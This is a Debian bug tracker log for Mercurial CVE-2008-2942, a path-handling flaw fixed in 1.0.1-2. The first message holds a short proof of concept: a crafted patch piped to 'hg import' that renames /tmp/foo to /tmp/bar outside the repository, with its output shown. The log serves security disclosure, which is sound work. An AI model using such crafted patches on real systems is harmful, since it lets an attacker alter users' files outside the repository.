Debian Bug report logs -
#488628
mercurial: CVE-2008-2942 Insufficient input validation
Reported by: Steffen Joeris <steffen.joeris@skolelinux.de>
Date: Mon, 30 Jun 2008 07:54:07 UTC
Severity: grave
Tags: patch, security
Fixed in version mercurial/1.0.1-2
Done: Vincent Danjean <vdanjean@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>:
Bug#488628; Package mercurial.
(full text, mbox, link).
Acknowledgement sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>.
(full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole
Hi
It is possible to rename arbitrary files, even outside
the repository by using a maliciously crafted patch.
Proof of concept:
echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory
hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root
cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux
The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.
Cheers
Steffen
[0]: http://www.selenic.com/hg/rev/87c704ac92d4
Information forwarded to debian-bugs-dist@lists.debian.org, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>:
Bug#488628; Package mercurial.
(full text, mbox, link).
Acknowledgement sent to Nico Golde <nion@debian.org>:
Extra info received and forwarded to list. Copy sent to Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>.
(full text, mbox, link).
Message #10 received at 488628@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Hi,
the following CVE id has been assigned to this issue, please
reference it in the changelog when closing this bug.
Name: CVE-2008-2942
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2942
Reference: CONFIRM:http://www.selenic.com/hg/rev/87c704ac92d4
Reference: MLIST:[oss-security] 20080630 CVE id request mercurial:Insufficient input validation
Reference: URL:http://www.openwall.com/lists/oss-security/2008/06/30/1
Directory traversal vulnerability in patch.py in Mercurial 1.0.1
allows user-assisted attackers to modify arbitrary files via ".." (dot
dot) sequences in a patch file.
Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[Message part 2 (application/pgp-signature, inline)]
Changed Bug title to `mercurial: CVE-2008-2942 Insufficient input validation' from `mercurial: Insufficient input validation'.
Request was from Nico Golde <nion@debian.org>
to control@bugs.debian.org.
(Mon, 30 Jun 2008 19:42:05 GMT) (full text, mbox, link).
Reply sent to Vincent Danjean <vdanjean@debian.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
Bug acknowledged by developer.
(full text, mbox, link).
Message #17 received at 488628-close@bugs.debian.org (full text, mbox, reply):
Source: mercurial
Source-Version: 1.0.1-2
We believe that the bug you reported is fixed in the latest version of
mercurial, which is due to be installed in the Debian FTP archive:
mercurial-common_1.0.1-2_all.deb
to pool/main/m/mercurial/mercurial-common_1.0.1-2_all.deb
mercurial_1.0.1-2.diff.gz
to pool/main/m/mercurial/mercurial_1.0.1-2.diff.gz
mercurial_1.0.1-2.dsc
to pool/main/m/mercurial/mercurial_1.0.1-2.dsc
mercurial_1.0.1-2_i386.deb
to pool/main/m/mercurial/mercurial_1.0.1-2_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 488628@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Vincent Danjean <vdanjean@debian.org> (supplier of updated mercurial package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Tue, 01 Jul 2008 18:44:19 +0200
Source: mercurial
Binary: mercurial mercurial-common
Architecture: all i386 source
Version: 1.0.1-2
Distribution: unstable
Urgency: high
Maintainer: Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>
Changed-By: Vincent Danjean <vdanjean@debian.org>
Closes: 488628
Description:
mercurial-common - Scalable distributed version control system (Common files)
mercurial - Scalable distributed version control system
Changes:
mercurial (1.0.1-2) unstable; urgency=high
.
* Backport from upstream: fix CVE-2008-2942 Insufficient input validation
(Closes: #488628)
Checksums-Sha1:
15dd2a0b24430f10282dd7250f4d569f9ba53896 473590 mercurial-common_1.0.1-2_all.deb
358c77522f811c98011c9ed48db704deb0715898 24446 mercurial_1.0.1-2.diff.gz
a690c4277429629815a02372f5ba79f76584679d 87662 mercurial_1.0.1-2_i386.deb
dbe4c192538ef2292be5f34764936c8fb192f4e5 1408 mercurial_1.0.1-2.dsc
Checksums-Sha256:
0f2c7db6dc74465caf73f585837a453a6c13a8b083963737413bcc9f75321c8a 87662 mercurial_1.0.1-2_i386.deb
abe5fdc94b5037acdae4fb5282577980a8955143ad64543a1c7ed787fadeafd5 473590 mercurial-common_1.0.1-2_all.deb
ddcf55cc023497968800e8e57d72c0e588dff84346befd135bf9c16e89da57e2 1408 mercurial_1.0.1-2.dsc
eac44d71cfcd6506033b420ecbec87648f649784e35072ca57ca9e5c2a14788c 24446 mercurial_1.0.1-2.diff.gz
Files:
592377138367f9e5cb63780329ecf699 87662 devel optional mercurial_1.0.1-2_i386.deb
90cce5e1bd6b1fc0a312a6edddf7bba7 473590 devel optional mercurial-common_1.0.1-2_all.deb
d250275bede624e89b9d2b73bcf8b0ef 24446 devel optional mercurial_1.0.1-2.diff.gz
eae9ac0a5e50c59dda514b9a46fc708b 1408 devel optional mercurial_1.0.1-2.dsc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIamPrC/d4Z50CXocRAoH3AKCDg2DcVK4r1hfnIYgdXYddrqsdeACgjFP1
Zcng3zNFnYpM0LbqDPNiVZE=
=x6AY
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sat, 11 Jul 2009 07:29:23 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 14:10:44 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon